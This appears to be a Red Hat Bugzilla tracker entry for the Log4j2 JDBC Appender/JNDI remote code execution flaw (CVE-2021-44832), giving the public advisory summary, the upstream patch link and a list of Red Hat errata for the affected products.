Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2. References: https://issues.apache.org/jira/browse/LOG4J2-3293 https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143
Upstream patch: https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16
Created log4j tracking bugs for this issue: Affects: fedora-all [bug 2036026]
This issue has been addressed in the following products: Red Hat AMQ Streams 2.0.0 Via RHSA-2022:0138 https://access.redhat.com/errata/RHSA-2022:0138
This issue has been addressed in the following products: Red Hat Fuse 7.8.2 7.9.1 7.10.1 Via RHSA-2022:0203 https://access.redhat.com/errata/RHSA-2022:0203
This issue has been addressed in the following products: Red Hat Data Grid 8.2.3 Via RHSA-2022:0205 https://access.redhat.com/errata/RHSA-2022:0205
This issue has been addressed in the following products: Vert.x 4.1.8 Via RHSA-2022:0083 https://access.redhat.com/errata/RHSA-2022:0083
This issue has been addressed in the following products: EAP 7.4 log4j async Via RHSA-2022:0216 https://access.redhat.com/errata/RHSA-2022:0216
This issue has been addressed in the following products: Red Hat Integration Camel Extensions for Quarkus 2.2 Via RHSA-2022:0222 https://access.redhat.com/errata/RHSA-2022:0222
This issue has been addressed in the following products: Red Hat Integration Camel-K 1.6.3 Via RHSA-2022:0223 https://access.redhat.com/errata/RHSA-2022:0223
This issue has been addressed in the following products: OpenShift Logging 5.0 Via RHSA-2022:0225 https://access.redhat.com/errata/RHSA-2022:0225
This issue has been addressed in the following products: OpenShift Logging 5.1 Via RHSA-2022:0226 https://access.redhat.com/errata/RHSA-2022:0226
This issue has been addressed in the following products: OpenShift Logging 5.3 Via RHSA-2022:0227 https://access.redhat.com/errata/RHSA-2022:0227
This issue has been addressed in the following products: OpenShift Logging 5.2 Via RHSA-2022:0230 https://access.redhat.com/errata/RHSA-2022:0230
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s): https://access.redhat.com/security/cve/cve-2021-44832
This issue has been addressed in the following products: Red Hat OpenShift Container Platform 3.11 Via RHSA-2022:0236 https://access.redhat.com/errata/RHSA-2022:0236
This issue has been addressed in the following products: Red Hat OpenShift Container Platform 4.6 Via RHSA-2022:0181 https://access.redhat.com/errata/RHSA-2022:0181
This issue has been addressed in the following products: Red Hat AMQ Streams 1.6.7 Via RHSA-2022:0467 https://access.redhat.com/errata/RHSA-2022:0467
This issue has been addressed in the following products: Red Hat OpenShift Container Platform 4.7 Via RHSA-2022:0493 https://access.redhat.com/errata/RHSA-2022:0493
This issue has been addressed in the following products: Red Hat OpenShift Container Platform 4.8 Via RHSA-2022:0485 https://access.redhat.com/errata/RHSA-2022:0485
This issue has been addressed in the following products: Red Hat JBoss Enterprise Application Platform 7.4 on RHEL 7 Via RHSA-2022:1296 https://access.redhat.com/errata/RHSA-2022:1296
This issue has been addressed in the following products: Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8 Via RHSA-2022:1297 https://access.redhat.com/errata/RHSA-2022:1297
This issue has been addressed in the following products: EAP 7.4.4 release Via RHSA-2022:1299 https://access.redhat.com/errata/RHSA-2022:1299